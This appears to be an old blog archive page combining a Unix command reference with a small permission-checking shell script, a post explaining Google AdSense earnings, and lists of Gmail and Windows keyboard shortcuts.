-v, --verbose output a diagnostic for every file processed

The following options modify how a hierarchy is traversed when the -R option is also specified. If more than one is specified, only the final one takes effect.

-H if a command line argument is a symbolic link to a directory, traverse it

-L traverse every symbolic link to a directory encountered

-P do not traverse any symbolic links (default)

chmod - change file access permissions

Usage

chmod [-R] permissions filenames

-R Change the permissions on files that are in the subdirectories of the directory that you are currently in.

permissions Specifies the rights that are being granted. Below are the different rights that you can grant in an alphanumeric format.

filenames File or directory that you are associating the rights with.

Permissions

u - User who owns the file.

g - Group that owns the file.

o - Other.

a - All.

r - Read the file.

w - Write or edit the file.

x - Execute or run the file as a program.

Numeric Permissions:

Permissions can also be set with chmod by using numeric values, which are added together to form the mode:

400 read by owner

040 read by group

004 read by anybody (other)

200 write by owner

020 write by group

002 write by anybody

100 execute by owner

010 execute by group

001 execute by anybody
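The nine values above are additive, so a mode such as 640 is 400 + 200 + 040. The following shell script is an added example, not part of the original post: it decodes a numeric mode into rwx notation, checks it against what `mkdir -m` and `chmod` actually set, and lists entries carrying the 002 ("write by anybody") bit. The function names and the sample file names are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example. Touches only a scratch directory created by mktemp.

# Decode a numeric mode such as 640 into rwx notation by testing each of the
# nine values from the list above (400, 200, 100, 040, 020, 010, 004, 002, 001).
mode_to_symbolic() {
    case $1 in
        ''|*[!0-7]*) echo "not an octal mode: $1" >&2; return 2 ;;
    esac
    mode=$((0$1))    # the leading 0 makes the shell read the digits as octal
    out=""
    for bit in 0400:r 0200:w 0100:x 0040:r 0020:w 0010:x 0004:r 0002:w 0001:x; do
        if [ $(( mode & ${bit%%:*} )) -ne 0 ]; then
            out="$out${bit##*:}"
        else
            out="$out-"
        fi
    done
    printf '%s\n' "$out"
}

# Permission string of an existing file, taken from the long listing (ls -l).
file_symbolic() {
    ls -ld "$1" | cut -c2-10
}

# Files and directories under $1 with the 002 bit set ("write by anybody").
world_writable() {
    find "$1" \( -type f -o -type d \) -perm -002 -print | sort
}

# Build a constructed sample tree and print its path.
build_sample_tree() {
    root=$(mktemp -d) || return 1
    mkdir -m 750 "$root/private"                 # mode set at creation time
    : > "$root/report.txt";     chmod 644 "$root/report.txt"
    : > "$root/shared.log";     chmod 666 "$root/shared.log"   # 002 is set
    : > "$root/private/run.sh"; chmod 754 "$root/private/run.sh"
    printf '%s\n' "$root"
}

# Demo: show each sample entry's permissions, then the world-writable ones.
tree=$(build_sample_tree)
for f in "$tree/private" "$tree/report.txt" "$tree/shared.log"; do
    printf '%s  %s\n' "$(file_symbolic "$f")" "$f"
done
echo "world-writable:"
world_writable "$tree"
rm -rf "$tree"
```

Pointing `world_writable` at a real directory such as a web root or a shared home area gives a quick audit of files any local user can modify.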

ls - Short listing of directory contents

-a list hidden files

-d list the name of the current directory

-F show directories with a trailing '/' and executable files with a trailing '*'

-g show group ownership of file in long listing

-i print the inode number of each file

-l long listing giving details about files and directories

-R list all subdirectories encountered

-t sort by time modified instead of name

cp - Copy files

cp myfile yourfile

Copy the file "myfile" to the file "yourfile" in the current working directory. This command will create the file "yourfile" if it doesn't exist. It will normally overwrite it without warning if it exists.

cp -i myfile yourfile

With the "-i" option, if the file "yourfile" exists, you will be prompted before it is overwritten.

cp -i /data/myfile .

Copy the file "/data/myfile" to the current working directory and name it "myfile". Prompt before overwriting the file.

cp -dpr srcdir destdir

Copy all files from the directory "srcdir" to the directory "destdir", preserving links (-d option) and file attributes (-p option), and copying recursively (-r option). With these options, a directory and all its contents can be copied to another directory.

ln - Creates a symbolic link to a file.

ln -s test symlink

Creates a symbolic link named symlink that points to the file test. Typing "ls -i test symlink" will show the two files are different with different inodes. Typing "ls -l test symlink" will show that symlink points to the file test.

locate - A fast database driven file locator.

slocate -u

This command builds the slocate database. It will take several minutes to complete. This command must be used before searching for files; however, cron runs this command periodically on most systems.

locate whereis

Lists all files whose names contain the string "whereis".

more - Allows file contents or piped output to be sent to the screen one page at a time

less - Opposite of the more command

cat - Sends file contents to standard output. This is a way to list the contents of short files to the screen. It works well with piping.

whereis - Report all known instances of a command

wc - Print byte, word, and line counts

bg

bg jobs - Places the current job (or, by using the alternative form, the specified jobs) in the background, suspending its execution so that a new user prompt appears immediately. Use the jobs command to discover the identities of background jobs.

cal month year - Prints a calendar for the specified month of the specified year.

cat files - Prints the contents of the specified files.

clear - Clears the terminal screen.

cmp file1 file2 - Compares two files, reporting all discrepancies. Similar to the diff command, though the output format differs.

diff file1 file2 - Compares two files, reporting all discrepancies. Similar to the cmp command, though the output format differs.

dmesg - Prints the messages resulting from the most recent system boot.

fg

fg jobs - Brings the current job (or the specified jobs) to the foreground.

file files - Determines and prints a description of the type of each specified file.

find path -name pattern -print

Searches the specified path for files with names matching the specified pattern (usually enclosed in single quotes) and prints their names. The find command has many other arguments and functions; see the online documentation.

finger users - Prints descriptions of the specified users.

free - Displays the amount of used and free system memory.

ftp hostname

Opens an FTP connection to the specified host, allowing files to be transferred. The FTP program provides subcommands for accomplishing file transfers; see the online documentation.

head files - Prints the first several lines of each specified file.

ispell files - Checks the spelling of the contents of the specified files.

kill process_ids

kill - signal process_ids

kill -l

Kills the specified processes, sends the specified processes the specified signal (given as a number or name), or prints a list of available signals.

killall program

killall - signal program

Kills all processes that are instances of the specified program or sends the specified signal to all processes that are instances of the specified program.

mail - Launches a simple mail client that permits sending and receiving email messages.

man title

man section title - Prints the specified man page.

ping host - Sends an echo request via TCP/IP to the specified host. A response confirms that the host is operational.

reboot - Reboots the system (requires root privileges).

shutdown minutes

shutdown -r minutes

Shuts down the system after the specified number of minutes elapses (requires root privileges). The -r option causes the system to be rebooted once it has shut down.

sleep time - Causes the command interpreter to pause for the specified number of seconds.

sort files - Sorts the specified files. The command has many useful arguments; see the online documentation.

split file - Splits a file into several smaller files. The command has many arguments; see the online documentation.

sync - Completes all pending input/output operations (requires root privileges).

telnet host - Opens a login session on the specified host.

top - Prints a display of system processes that's continually updated until the user presses the q key.

traceroute host - Uses echo requests to determine and print a network path to the host.

uptime - Prints the system uptime.

w - Prints the current system users.

wall - Prints a message to each user except those who've disabled message reception. Type Ctrl-D to end the message.

Monday, May 14, 2007

About Google AdSense

What is Google AdSense? How does it work? What are its benefits? How is it implemented? What do we get from this program? Who runs it? ......

Many people have asked me about Google AdSense, because most of the information about Google AdSense on the Internet is in English. So I will now discuss Google AdSense in Indonesian. Google AdSense is a Google product that can be used to earn money by placing Google advertising on your website or blog. The basic concept is that you want to earn income from a website you own, and Google provides the facility for it. So, just by placing Google ads on your website, you can earn a variable income denominated in US dollars. Variable here means that what you earn varies with the number of clicks on the Google banner and with the advertising value set by the advertiser working with Google. What you earn usually varies between US$ 0.01 and US$ 5, or even more than that, depending on the value set by the advertiser at Google.

The way it works is that each advertiser on Google sets the amount they pay for each click; the more clicks on their website, the more you earn.

However, that does not mean you should rely solely on income as a publisher. It is not uncommon for someone who has joined this program to earn only US$1 or US$2 in a month. For that reason, I recommend this only as a side income.

Here is an example report of the results I have obtained over almost 2 months:

How do you get started? Please look at the bottom of this blog ... and click the icon labeled "Earn Money by Showing relevant ads with Google AdSense".

Gmail ShortCut

Keyboard shortcuts help you save time since you never have to take your hands off the keyboard to use the mouse. You'll need a Standard 101/102-Key or Natural PS/2 Keyboard to use the shortcuts.

To turn these case-sensitive shortcuts on or off, click Settings, and then pick an option next to Keyboard shortcuts.

Shortcut Key Definition Action
c Compose Allows you to compose a new message. <Shift> + c allows you to compose a message in a new window.
/ Search Puts your cursor in the search box.
k Move to newer conversation Opens or moves your cursor to a more recent conversation. You can hit <Enter> to expand a conversation.
j Move to older conversation Opens or moves your cursor to the next oldest conversation. You can hit <Enter> to expand a conversation.
n Next message Moves your cursor to the next message. You can hit <Enter> to expand or collapse a message. (Only applicable in 'Conversation View.')
p Previous message Moves your cursor to the previous message. You can hit <Enter> to expand or collapse a message. (Only applicable in 'Conversation View.')
o or <Enter> Open Opens your conversation. Also expands or collapses a message if you are in 'Conversation View.'
u Return to conversation list Refreshes your page and returns you to the inbox, or list of conversations.
y Archive* (Remove from current view) Automatically removes the message or conversation from your current view.
  • From 'Inbox,' 'y' means Archive
  • From 'Starred,' 'y' means Unstar
  • From any label, 'y' means Remove the label
* 'y' has no effect if you're in 'Spam,' 'Sent,' or 'All Mail.'
m Mute Archives the conversation, and all future messages skip the Inbox unless sent or cc'd directly to you.
x Select conversation Automatically checks and selects a conversation so that you can archive, apply a label, or choose an action from the drop-down menu to apply to that conversation.
s Star a message or conversation Adds or removes a star to a message or conversation. Stars allow you to give a message or conversation a special status.
! Report spam Marks a message as spam and removes it from your conversation list.
r Reply Reply to the message sender. <Shift> + r allows you to reply to a message in a new window. (Only applicable in 'Conversation View.')
a Reply all Reply to all message recipients. <Shift> + a allows you to reply to all message recipients in a new window. (Only applicable in 'Conversation View.')
f Forward Forward a message. <Shift> + f allows you to forward a message in a new window. (Only applicable in 'Conversation View.')
<Esc> Escape from input field Removes the cursor from your current input field.
<Ctrl> + s Save draft Holding the <Ctrl> key while pressing s when composing a message will save the current text as a draft. Make sure your cursor is in one of the text fields -- either the composition pane, or any of the To, CC, BCC, or Subject fields -- when using this shortcut. Macintosh users should use <Cmd> + s.
# Delete Moves the conversation to Trash.

Combo-keys - Use the following combinations of keys to navigate through Gmail.

Shortcut Key Definition Action
<Tab> then <Enter> Send message After composing your message, use this combination to send it automatically. (Supported in Internet Explorer and Firefox, on Windows.)
y then o Archive and next Archive your conversation and move to the next one.
g then a Go to 'All Mail' Takes you to 'All Mail,' the storage site for all mail you've ever sent or received (and have not deleted).
g then s Go to 'Starred' Takes you to all conversations you have starred.
g then c Go to 'Contacts' Takes you to your Contacts list.
g then d Go to 'Drafts' Takes you to all drafts you have saved.
g then i Go to 'Inbox' Returns you to the inbox.


Windows ShortCut


Windows system key combinations

F1: Help
CTRL+ESC: Open Start menu
ALT+TAB: Switch between open programs
ALT+F4: Quit program
SHIFT+DELETE: Delete item permanently

Windows program key combinations

CTRL+C: Copy
CTRL+X: Cut
CTRL+V: Paste
CTRL+Z: Undo
CTRL+B: Bold
CTRL+U: Underline
CTRL+I: Italic


Mouse click/keyboard modifier combinations for shell objects

SHIFT+right click: Displays a shortcut menu containing alternative commands
SHIFT+double click: Runs the alternate default command (the second item on the menu)
ALT+double click: Displays properties
SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin

General keyboard-only commands

F1: Starts Windows Help
F10: Activates menu bar options
SHIFT+F10: Opens a shortcut menu for the selected item (this is the same as right-clicking an object)
CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item)
CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
ALT+DOWN ARROW: Opens a drop-down list box
ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
ALT+underlined letter in menu: Opens the menu
ALT+F4: Closes the current window
CTRL+F4: Closes the current Multiple Document Interface (MDI) window
ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)


Shell objects and general folder/Windows Explorer shortcuts

For a selected object:
F2: Rename object
F3: Find all files
CTRL+X: Cut
CTRL+C: Copy
CTRL+V: Paste
SHIFT+DELETE: Delete selection immediately, without moving the item to the Recycle Bin
ALT+ENTER: Open the properties for the selected object

To copy a file

Press and hold down the CTRL key while you drag the file to another folder.

To create a shortcut

Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.


General folder/shortcut control

F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
F5: Refreshes the current window.
F6: Moves among panes in Windows Explorer
CTRL+G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
CTRL+Z: Undo the last command
CTRL+A: Select all the items in the current window
BACKSPACE: Switch to the parent folder
SHIFT+click+Close button: For folders, close the current folder plus all parent folders


Windows Explorer tree control

Numeric Keypad *: Expands everything under the current selection
Numeric Keypad +: Expands the current selection
Numeric Keypad -: Collapses the current selection.
RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child
LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent


Properties control

CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs


Accessibility shortcuts

Press SHIFT five times: Toggles StickyKeys on and off
Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off
Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off
Left ALT+left SHIFT+NUM LOCK: Toggles MouseKeys on and off
Left ALT+left SHIFT+PRINT SCREEN: Toggles high contrast on and off


Microsoft Natural Keyboard keys

Windows Logo: Start menu
Windows Logo+R: Run dialog box
Windows Logo+M: Minimize all
SHIFT+Windows Logo+M: Undo minimize all
Windows Logo+F1: Help
Windows Logo+E: Windows Explorer
Windows Logo+F: Find files or folders
Windows Logo+D: Minimizes all open windows and displays the desktop
CTRL+Windows Logo+F: Find computer
CTRL+Windows Logo+TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
Windows Logo+TAB: Cycle through taskbar buttons
Windows Logo+Break: System Properties dialog box
Application key: Displays a shortcut menu for the selected item


Microsoft Natural Keyboard with IntelliType software installed

Windows Logo+L: Log off Windows
Windows Logo+P: Starts Print Manager
Windows Logo+C: Opens Control Panel
Windows Logo+V: Starts Clipboard
Windows Logo+K: Opens Keyboard Properties dialog box
Windows Logo+I: Opens Mouse Properties dialog box
Windows Logo+A: Starts Accessibility Options (if installed)
Windows Logo+SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys
Windows Logo+S: Toggles CAPS LOCK on and off


Dialog box keyboard commands

TAB: Move to the next control in the dialog box
SHIFT+TAB: Move to the previous control in the dialog box
SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
ENTER: Equivalent to clicking the selected button (the button with the outline)
ESC: Equivalent to clicking the Cancel button
ALT+underlined letter in dialog box item: Move to the corresponding item